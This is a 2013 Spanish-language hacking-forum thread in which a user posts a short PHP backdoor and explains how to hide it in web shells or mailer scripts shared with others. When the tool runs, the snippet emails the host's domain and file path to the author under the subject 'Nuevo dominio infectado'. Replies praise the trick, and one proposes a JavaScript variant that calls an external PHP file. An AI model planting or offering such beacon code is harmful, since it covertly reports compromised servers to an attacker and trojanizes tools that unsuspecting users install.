Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Okol en Enero 14, 2013, 08:54:02 PM

Título: Backdorizando un archivo PHP
Publicado por: Okol en Enero 14, 2013, 08:54:02 PM
Hola, esperando tengan una buena noche.
Hoy explicaré como backdorizar un archivo .PHP o puede ser .html
Bueno son 3 lineas las cuales nos serán de gran utilidad.
usaremos la variable global $_SERVER y la funcion mail()

Código (php) [Seleccionar]

<?php
$domain 
$_SERVER['SERVER_NAME'];//El dominio en el cual está nuestro archivo
$ruta $_SERVER['PHP_SELF'];//la ruta de el archivo
mail('[email protected]''Nuevo dominio infectado'$domain.$ruta);//Manda un mail con la ruta
?>



¿Ideas?
Esto podría servir poniéndolo en algún mailer ó alguna shell y cuando el usuario entre a la shell o el mailer nos mandará un email con la ruta.

(Modificar mi email por el suyo en el primer parámetro de la función mail() ).


PD: No me hago responsable de el uso de esto. Estoy en contra de esas practicas pero... Hay que compartir y espero a más de uno le sirva.

Saludos!
Título: Re:Backdorizando un archivo PHP
Publicado por: Oggy en Enero 14, 2013, 09:02:13 PM
yo que solo pensaba que servias para ponerte borracho, esta genial para los que normalmente se acostumbran a usar tools sin examinarlas.
http://prntscr.com/p77s2
Nice brother.
PD: ahora no te vayas a poner a infectar las tools-
Título: Re:Backdorizando un archivo PHP
Publicado por: [3V1L] en Enero 14, 2013, 09:09:44 PM
gracias man!
Título: Re:Backdorizando un archivo PHP
Publicado por: Okol en Enero 14, 2013, 10:49:49 PM
Me alegra que les haya sido útil.
Saludos.
Título: Re:Backdorizando un archivo PHP
Publicado por: Dedalo en Enero 14, 2013, 11:55:14 PM
podrías acortar el code usando document.location con javascript y un .php externo.... así lo haría yo...


Saludos,
Dedalo
Título: Re:Backdorizando un archivo PHP
Publicado por: Okol en Enero 15, 2013, 12:27:22 AM
habrá mil formas de hacer algo.
yo expliqué una bro.
saludos.